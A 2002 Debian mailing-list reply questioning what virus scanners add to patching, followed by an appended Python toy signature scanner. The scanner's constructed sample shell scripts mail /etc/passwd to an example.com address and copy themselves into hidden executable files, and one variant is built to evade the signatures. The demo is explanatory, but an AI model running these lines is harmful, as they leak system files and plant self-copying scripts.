
Re: virus killers?



On Saturday 12 October 2002 21:35, Jamin W. Collins wrote:
> On Fri, Oct 11, 2002 at 10:22:08PM -0700, Vineet Kumar wrote:
> > Had my message consisted solely of "Nope." that would have been bad
> > advice.  But, in fairness, I did mention that there are other steps to
> > take in order to secure a debian machine, but that a virus scanner isn't
> > necessarily one of them.
>
> The dismissal of a virus scanner as one of the steps to secure a system
> (Linux based or otherwise) is the bad advice.  It's somewhat similar to
> thinking that just because you might happen to live in a
> neighborhood/city with little to no crime that there is no need to lock
> your house when you leave.  While this may be true the majority of the
> time, it's silly not to take the extra precaution.

I have to admit that I've had a different view of the whole virus thing. I've 
used that view frequently when I rant about how bad windoze is, so if I'm 
totally off here, it would be nice to be told so by friends...:

I mean, whatever viruses can exploit to propagate has to be a huge security 
hole, right? So, the problem can't really be the virus, but rather the 
security hole that the virus is allowed to exploit, and virus scanners' 
purpose seems mainly to look for signs of exploits of known holes. They have 
to be known, otherwise you wouldn't know what to look for. So, instead of 
patching the hole, the "get the latest definition" paradigm tries to identify 
exploits of those holes. 

I mean, most of the viruses we see are random attacks, with no special 
purpose, attacking random machines, and usually making a lot of fuss about 
it.

Imaginably, you could do the same thing as the virus, but silently and more 
directed, so that the anti-virus companies that produce definitions never 
hear about it and never respond to it, and the victim never notices (and 
doesn't notice e.g. a data theft, and doesn't notify their definition provider).

So, what role do the definitions play for a well-patched and well-maintained 
system, other than identifying that something is going on? Are there 
unpatchable, intrinsic design flaws that could be exploited by viruses? If 
so, what is it that prevents exploits by anybody?

Well, I'm just curious... :-)

Best,

Kjetil
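
As an added illustration of the point raised in the message above (example code written for this page, not something posted in the thread): a toy signature scanner with a constructed definition set. It catches the noisy "known sample" by both a whole-file hash and a byte pattern, but a rewritten variant that does exactly the same thing (and one aimed at a single victim rather than everyone) matches nothing. All sample scripts and definition names are invented for the example; they are not real malware or real signatures.

```python
import hashlib

# Constructed "known sample" and the definitions a scanner would ship for it.
# Purely illustrative text, not a real virus or real signatures.
KNOWN_SAMPLE = (
    b"#!/bin/sh\n"
    b"cat /etc/passwd | mail everyone@example.com\n"  # noisy, indiscriminate
    b"cp \"$0\" /tmp/.w && chmod +x /tmp/.w\n"         # copies itself around
)

DEFINITIONS = {
    # whole-file hash signature (only ever matches this exact byte sequence)
    "Example.Worm.A.hash": hashlib.sha256(KNOWN_SAMPLE).hexdigest(),
    # byte-pattern signature cut from the known sample
    "Example.Worm.A.pattern": b"cat /etc/passwd | mail ",
}


def scan(data: bytes, definitions=DEFINITIONS):
    """Return the names of every definition that matches `data`."""
    digest = hashlib.sha256(data).hexdigest()
    hits = []
    for name, sig in definitions.items():
        if isinstance(sig, str):          # hash-style definition
            if sig == digest:
                hits.append(name)
        elif sig in data:                 # pattern-style definition
            hits.append(name)
    return hits


# Same actions, different bytes: a single target, passwd fed via redirect
# instead of a pipe, copy placed elsewhere. Also constructed for this example.
VARIANT = (
    b"#!/bin/sh\n"
    b"mail one.victim@example.com < /etc/passwd\n"
    b"cp \"$0\" /var/tmp/.x && chmod +x /var/tmp/.x\n"
)

CLEAN = b"#!/bin/sh\necho hello\n"


def demo():
    """Scan the three constructed inputs and return the hits per label."""
    return {
        "known": scan(KNOWN_SAMPLE),
        "variant": scan(VARIANT),
        "clean": scan(CLEAN),
    }


if __name__ == "__main__":
    for label, hits in demo().items():
        print(f"{label:8s} -> {hits or 'no match'}")
```

The variant needs no new technique to slip past the definitions; it only needs bytes the definition provider has never seen. Whatever lets an untrusted script read those files and plant executable copies in the first place is the hole both samples depend on, and closing it stops both, while a definition update only ever stops the one that was reported.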
